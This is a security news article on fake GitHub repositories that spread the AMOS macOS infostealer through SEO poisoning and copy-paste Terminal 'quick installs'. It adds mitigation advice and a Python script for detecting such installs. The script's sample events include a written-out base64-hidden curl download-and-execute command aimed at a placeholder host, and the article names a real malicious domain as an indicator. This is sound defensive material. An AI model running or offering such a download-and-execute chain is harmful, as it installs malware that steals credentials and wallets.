Fake GitHub Repositories Push Atomic Stealer (AMOS) to macOS Users via SEO Poisoning

CyberSecureFox 🦊

Threat actors are abusing search engine optimization (SEO) to seed fake GitHub repositories that impersonate well-known macOS software and redirect victims to installers for Atomic Stealer (AMOS). LastPass reports that the scheme specifically targeted macOS users and relied on GitHub’s reputation and high search rankings to bypass user skepticism.

SEO-poisoning on GitHub: how macOS users are funneled to malware

Analysts identified two repositories published on 16 September 2025 by the account modhopmduck476 that posed as official LastPass projects. Each linked to a supposed “LastPass for MacBook” download, ultimately sending users to the same trap page. Although those repos were removed, the technique remains active and repeatable.

“ClickFix” social engineering: copy–paste to compromise

The GitHub links led to a landing page that promoted a "quick install": copy a single command into Terminal. This is the ClickFix pattern, in which a promised simple fix conceals a malicious action. The pasted command ran curl against an encoded URL, saved an "Update" payload to a temporary directory, and launched it to begin the AMOS installation. Because the victim runs the command in their own Terminal session, the payload arrives through curl rather than a browser download: it carries no quarantine attribute, so Gatekeeper never evaluates it, and none of the prompts a normal application install would raise ever appear. That is why the flow so often passes casual scrutiny.

Campaign scope and brand impersonation beyond LastPass

Research indicates the activity has run since at least July and is not limited to LastPass branding. Other impersonated software and services include 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne. Multiple accounts followed a similar naming pattern (brand + macOS/Mac), complicating manual moderation and enabling rapid re-seeding after takedowns.

Atomic Stealer (AMOS): capabilities and why it matters

AMOS is a commercial macOS infostealer sold in underground markets since 2023 and widely tracked by security vendors (e.g., Malwarebytes, SentinelOne, Jamf). It targets browser data (cookies, autofill, saved passwords) and cryptocurrency wallets, and can attempt to access Keychain items. Recent reporting from multiple research teams notes the addition of a backdoor component, which extends persistence and post-compromise activity. In the observed chain, the domain macprograms-pro[.]com acted as an intermediate step. The repeated use of external redirects and look-alike "install" pages with Terminal instructions is a consistent TTP and a reliable hunting indicator.

Risks for individuals and organizations

The immediate risk is credential theft leading to account takeover across email, cloud services, finance, and corporate resources. On macOS specifically, the copy-paste Terminal flow can look "official" and proceeds with fewer visible warnings than a typical application download, increasing the likelihood that a user runs it; the stolen session cookies and passwords then give an attacker a foothold for lateral movement in enterprise environments.

Mitigations and detection guidance

Use trusted distribution channels only. Prefer vendor domains and the Mac App Store. Treat newly created GitHub repositories with no commit history, zero stars, and marketing-heavy descriptions as high risk.

Verify project ownership. Look for GitHub organization verification, cross-links from the vendor's official website, and Apple notarization and Developer ID signing on installers. Keep in mind that Gatekeeper only evaluates files that carry the quarantine attribute (browser downloads, for example); a binary fetched with curl and executed from Terminal is never checked, so treat any prompt that asks you to bypass protections, and any install path that avoids them entirely, as a red flag.

Avoid blind Terminal execution. Any "one-line fix" is a red flag. Administrators should restrict execution of untrusted scripts, alert on or block curl|sh-style download-and-execute pipelines, and enforce least privilege. Deploy and tune macOS EDR to flag suspicious Terminal-driven downloads, base64/URL decoding, and execution from temporary directories.

Counter SEO-poisoning. Implement secure DNS and domain-age filtering, block known-bad and newly registered domains, and train users to validate URLs and downloads against official sources before installation.

Hunt for indicators and behaviors. Monitor for connections to macprograms-pro[.]com, anomalous curl usage, persistence artifacts, and unusual access to browser credential stores and Keychain. Consider adding content controls that warn on copy–paste of commands from the web into Terminal.
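The Terminal-driven chain described under ClickFix above and the behaviours this hunting guidance lists can be turned into a small correlation check. The following Python is an added example for this article, not code from the original page or from any vendor: it runs a handful of rules over constructed process and network events (the field names event_type, pid, parent, cmdline and dest_host are assumed for a generic EDR export, the parent application names are an assumption, and the hidden payload URL is made up), flags the download-to-temp, base64-decode, execute-from-temp and IOC-domain signals, and correlates them by PID.

```python
"""Flag the ClickFix download-and-execute chain in macOS endpoint telemetry.
Added example for this article, not code from the page or any vendor. The event schema
(event_type, pid, parent, cmdline, dest_host) is assumed; every SAMPLE_EVENTS record is constructed."""
import base64
import json
import re

# ClickFix one-liners hide the real URL behind base64; this URL is made up for the example.
HIDDEN_URL = "https://downloads.example.invalid/Update"
ENCODED_URL = base64.b64encode(HIDDEN_URL.encode()).decode()

# Constructed JSON-lines telemetry. pid 502 models the article's chain (Terminal -> shell -> decode
# URL -> curl to a temp dir -> chmod/run from the temp dir -> contact the intermediate domain the
# article names); pid 501 is benign and pid 503 is a lone weak signal.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"event_type": "process", "pid": 501, "parent": "Terminal",
                "cmdline": "brew install wget"}),
    json.dumps({"event_type": "process", "pid": 502, "parent": "Terminal",
                "cmdline": f"/bin/bash -c 'echo {ENCODED_URL} | base64 -d | xargs curl -fsSL "
                           "-o /tmp/Update && chmod +x /tmp/Update && /tmp/Update'"}),
    json.dumps({"event_type": "network", "pid": 502, "parent": "Terminal",
                "dest_host": "macprograms-pro.com", "dest_port": 443}),
    json.dumps({"event_type": "process", "pid": 503, "parent": "launchd",
                "cmdline": "/usr/bin/curl -sS -o /var/folders/xy/T/Update https://cdn.example.invalid/u"}),
])

TEMP_DIR = r"(?:(?:/private)?/tmp/|/var/folders/|\$TMPDIR/)"
# [^;&|]* keeps each check inside one pipeline stage of the command line.
DOWNLOAD_TO_TEMP = re.compile(r"\b(?:curl|wget)\b[^;&|]*" + TEMP_DIR + r"\S+")
BASE64_DECODE = re.compile(r"\bbase64\b[^;&|]*(?:-d|-D|--decode)\b")  # macOS has -d and older -D
EXEC_FROM_TEMP = re.compile(r"(?:^|[;&|]\s*|\bchmod\s+\+x\s+)" + TEMP_DIR + r"\S+")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"]+")
IOC_DOMAINS = {"macprograms-pro.com"}    # the intermediate domain named in the article
TERMINAL_APPS = {"Terminal", "iTerm2"}   # parent process names are an assumption
CHAIN_RULES = {"download_to_tempdir", "base64_decode_in_cmdline", "encoded_url_decoded", "exec_from_tempdir"}


def decoded_urls(cmdline: str) -> list[str]:
    """Decode every long base64-looking token and return URLs found in the plaintext."""
    urls = []
    for token in B64_TOKEN.findall(cmdline):
        try:
            plain = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        urls.extend(URL_RE.findall(plain))
    return urls


def analyze_event(ev: dict) -> list[str]:
    """Return the rule names one event trips (empty if it looks benign)."""
    hits = []
    if ev.get("event_type") == "process":
        cmd = ev.get("cmdline", "")
        for name, fired in (("download_to_tempdir", DOWNLOAD_TO_TEMP.search(cmd)),
                            ("base64_decode_in_cmdline", BASE64_DECODE.search(cmd)),
                            ("encoded_url_decoded", decoded_urls(cmd)),
                            ("exec_from_tempdir", EXEC_FROM_TEMP.search(cmd))):
            if fired:
                hits.append(name)
    elif ev.get("event_type") == "network":
        host = ev.get("dest_host", "").lower().rstrip(".")
        if any(host == d or host.endswith("." + d) for d in IOC_DOMAINS):
            hits.append("ioc_domain")
    if hits and ev.get("parent") in TERMINAL_APPS:  # Terminal alone is not suspicious
        hits.append("spawned_from_terminal")
    return hits


def severity(rules: list[str]) -> str:
    """Known IOC or three-plus chain stages is high; a lone stage is worth a look, not a page."""
    return "high" if "ioc_domain" in rules or len(CHAIN_RULES.intersection(rules)) >= 3 else "medium"


def detect(jsonl: str) -> list[dict]:
    """Run the rules over JSON-lines telemetry; one finding per event that fired."""
    findings = []
    for line in filter(str.strip, jsonl.splitlines()):
        ev = json.loads(line)
        rules = analyze_event(ev)
        if rules:
            findings.append({"pid": ev.get("pid"), "event_type": ev["event_type"],
                             "severity": severity(rules), "rules": rules,
                             "decoded_urls": decoded_urls(ev.get("cmdline", ""))})
    return findings


def correlate_by_pid(findings: list[dict]) -> dict[int, set[str]]:
    """Union rules per pid so a process event and its network event reinforce each other."""
    by_pid: dict[int, set[str]] = {}
    for f in findings:
        by_pid.setdefault(f["pid"], set()).update(f["rules"])
    return by_pid


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid={f['pid']} {f['severity']:6} rules={','.join(f['rules'])} urls={f['decoded_urls']}")
```

The decoding step is what makes the rule useful against this campaign: the pasted one-liner never contains the download host in plain text, so a string match on a domain alone would miss it, while the decoded URL gives the analyst something to pivot on. Each single rule is noisy in isolation (plenty of build scripts download into $TMPDIR), which is why a finding is only rated high once several stages of the chain, or a known IOC, appear together for the same process.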

Attackers will continue to exploit trust in GitHub and search results to distribute macOS malware. Strengthen your software acquisition discipline, require provable authenticity for installers, and scrutinize any Terminal instructions that promise “quick fixes.” The most effective defense combines user education, strict source verification, and behavioral detections tuned to terminal-driven download-and-execute chains common to AMOS and similar threats.
